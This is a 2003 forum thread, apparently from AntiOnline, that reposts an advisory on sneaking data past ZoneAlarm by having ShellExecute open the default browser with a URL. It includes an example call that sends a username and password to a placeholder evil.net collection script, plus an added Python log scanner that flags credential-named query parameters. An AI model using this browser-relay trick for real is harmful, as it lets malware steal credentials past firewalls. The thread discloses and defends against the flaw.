-
June 23rd, 2003, 09:39 PM
#1
Bypassing ZoneAlarm
Hi everyone, this was an email I just got and I thought I'd post it... looks like ZoneAlarm users need to do some reconfiguring.
I don't know if this is a new issue but it is a simple way to
bypass (in some limited form) ZoneAlarm's application-level
Internet access blocking.
The Windows DLL shell32.dll exports a well-known and documented function called
ShellExecute. From the Win32 Programmer's Reference:
>HINSTANCE ShellExecute(
> HWND hwnd, // handle to parent window
> LPCTSTR lpOperation, // pointer to string that specifies
> // operation to perform
> LPCTSTR lpFile, // pointer to filename or folder name string
> LPCTSTR lpParameters, // pointer to string that specifies
> //executable-file parameters
> LPCTSTR lpDirectory, // pointer to string that specifies default directory
> INT nShowCmd // whether file is shown when opened
> );
When the lpFile parameter is an Internet URL, Windows invokes Internet
Explorer (or more accurately, the default web browser), which in 99% of
cases is allowed to access the Internet, with that URL. Example:
ShellExecute(
0,
"open",
"http://evil.net/collect.cgi?un=stolen_username&pw=stollen_password",
0,
0,
SW_HIDE //This doesn't work.
//I think it is supposed to hide the window but ...
);
The collect.cgi (after storing stolen_username/stolen_password) could
redirect the user, for example, to
windowsupdate.microsoft.com,
so that many users will not even suspect anything.
The info leaked is limited by the maximum allowed URL length, but that
could be more than enough for a malicious application to send some
username/password/cookie/cc_number info to a malicious server.
This was tested on ZoneAlarm 3.1.395 (freeware) but I guess that all
versions can be tricked if the user has granted access to his default
web browser by default (very likely).
VENDOR STATUS:
I think that this is a flaw in the core design of ZoneAlarm
(and/or Windows) and don't see a way it can be fixed.
WORKAROUND:
Do not allow ANY application to access Internet by default and
review each request separately.
Any comments are welcome.
aceh
My comment on this... It's ALWAYS safer not allowing any app to access the Internet by default!!!
I'm gone, thx everyone for so much fun and good info.
cheers and good bye
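The advisory's point is that the leak rides inside a URL handed to a browser the firewall already trusts, so the place a defender can still see it is the outbound web log. The following detector is an added example, not part of the email or the thread: it scans constructed proxy-style log lines (hypothetical hosts, not the advisory's) and flags requests whose query string carries credential-shaped parameter names or is long enough to be a data carrier.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Query-parameter names that commonly carry credentials or payment data
# (the advisory's example leaks a username/password via "un" and "pw").
SENSITIVE_PARAMS = {"un", "user", "username", "pw", "pass", "password",
                    "cookie", "cc", "cc_number", "card"}
# A browser launched with a URL can only carry data in the URL itself, so an
# unusually long query string is a second, keyword-independent signal.
MAX_QUERY_LEN = 200

# Constructed sample log: "<epoch> <client> <method> <url> <status>" (hypothetical hosts).
LOG_LINES = [
    "1056400000.123 10.0.0.5 GET http://windowsupdate.microsoft.com/ 200",
    "1056400001.456 10.0.0.5 GET http://evil.example/collect.cgi?un=alice&pw=hunter2 302",
    "1056400002.789 10.0.0.7 GET http://search.example/q?term=firewall 200",
    "1056400003.000 10.0.0.5 GET http://evil.example/c.cgi?d=" + "41" * 150 + " 200",
]

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d+)$")


def analyze_url(url):
    """Return the reasons (possibly none) a URL looks like it is carrying leaked data."""
    parts = urlsplit(url)
    reasons = []
    params = parse_qsl(parts.query, keep_blank_values=True)
    hits = sorted({name.lower() for name, _ in params if name.lower() in SENSITIVE_PARAMS})
    if hits:
        reasons.append("sensitive parameter names: " + ",".join(hits))
    if len(parts.query) > MAX_QUERY_LEN:
        reasons.append(f"query string length {len(parts.query)} exceeds {MAX_QUERY_LEN}")
    return reasons


def scan_log(lines):
    """Parse each log line and collect one finding per suspicious request."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the expected layout
        reasons = analyze_url(m["url"])
        if reasons:
            findings.append({"client": m["client"],
                             "host": urlsplit(m["url"]).hostname,
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_log(LOG_LINES):
        print(finding)
```

The keyword list will miss an attacker who renames the parameters, which is why the length check is there; tune MAX_QUERY_LEN against your own site's normal traffic before alerting on it.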
-
June 23rd, 2003, 09:58 PM
#2
It may be safer but what a pain in the @ss that would be for my kids. Having to go through 30-50 "application allow" popups every day. Why not just use a better product? Outpost anyone? Sygate?
But thanks for the heads up about ZA, not like I'd ever buy it or use it.
Mankind have a great aversion to intellectual labor; but even supposing knowledge to be easily attainable, more people would be content to be ignorant than would take even a little trouble to acquire it.
- Samuel Johnson
-
June 23rd, 2003, 10:17 PM
#3
lol
I went to their site to see if this was reported and if they have a patch. The site is down.
West of House
You are standing in an open field west of a white house, with a boarded front door.
There is a small mailbox here.
-
June 23rd, 2003, 10:44 PM
#4
ZoneAlarm needs to be seriously checked out -> it's MAD.
Sygate is good
xxx
-
June 23rd, 2003, 11:03 PM
#5
Good post, thanks for the heads up. I will try out Sygate.
-
June 24th, 2003, 06:32 AM
#6
Originally posted here by KorpDeath
It may be safer but what a pain in the @ss that would be for my kids. Having to go through 30-50 "application allow" popups every day. Why not just use a better product? Outpost anyone? Sygate?
But thanks for the heads up about ZA, not like I'd ever buy it or use it.
Haha, you're right, with kids using a box this would be a major problem!
-
June 24th, 2003, 11:22 AM
#7
There are other problems with ZoneAlarm too (at least with the last version I have seen; perhaps it's fixed now but I doubt it). For instance, at the login screen ZA is not loaded while Windows networking is. This means that everyone can access the shares on a box, like printing and file sharing; after the login ZA limits this to the internal network... so a box at the login screen is not protected by ZA. IMHO Sygate or Outpost are a better choice of desktop firewall.
-
June 24th, 2003, 02:29 PM
#8
What's with all the Zone Labs bashing? This is a Windows issue and will affect any personal firewall the same way... the firewall can stop an application but not a specific site unless you tell it what site to block. Moreover, to pull off this exploit you need to get local access to the system or a Trojan loaded and run on the system, as you cannot normally do shell commands remotely (most Windows boxes are not running telnet services). At the point someone is local/has your system compromised with a Trojan they can get your info without using this method, so your best defense in this case is to not let malicious users on the system.
Victor, the TrueVector defense in Zone Labs is a service and loads when Windows boots (as with all services); you are protected as soon as Windows boots. The "You are now protected" splash screen is just the intro to the GUI.
Who is more trustworthy than all of the gurus or Buddhas?
-
June 24th, 2003, 02:37 PM
#9
bballad, you have some excellent points, but about the splash screen thingie I have to disagree with you. Yep, they say its TrueVector defense does what you describe, but I tested this in a little test setup and was able to access the default shares with early versions of Zone Labs. That was very surprising, cause I thought, like you, that the protection did work before the splash screen. I know the splash screen is only the GUI intro, but there still seems to be a slight problem with the TrueVector idea:
It was discussed in a thread here at AO. http://www.antionline.com/showthread...ight=ZoneAlarm
Basically it means that if you allow local shares, but do not allow local shares in ZA, by setting no trusted neighbourhood networks and the highest security degree, it will still allow them when you are at the login screen. This is not a big deal, I know, and probably other products have this weakness too.
-
June 24th, 2003, 04:33 PM
#10
Originally posted here:
This is not a big deal, I know, and probably other products have this weakness too.
Think you're right on this one Vic. Software takes time to load; before that, no defense... hardware on the other hand... instant protection!
But like you said, not a big deal if you use a good AV product and practise safe computing!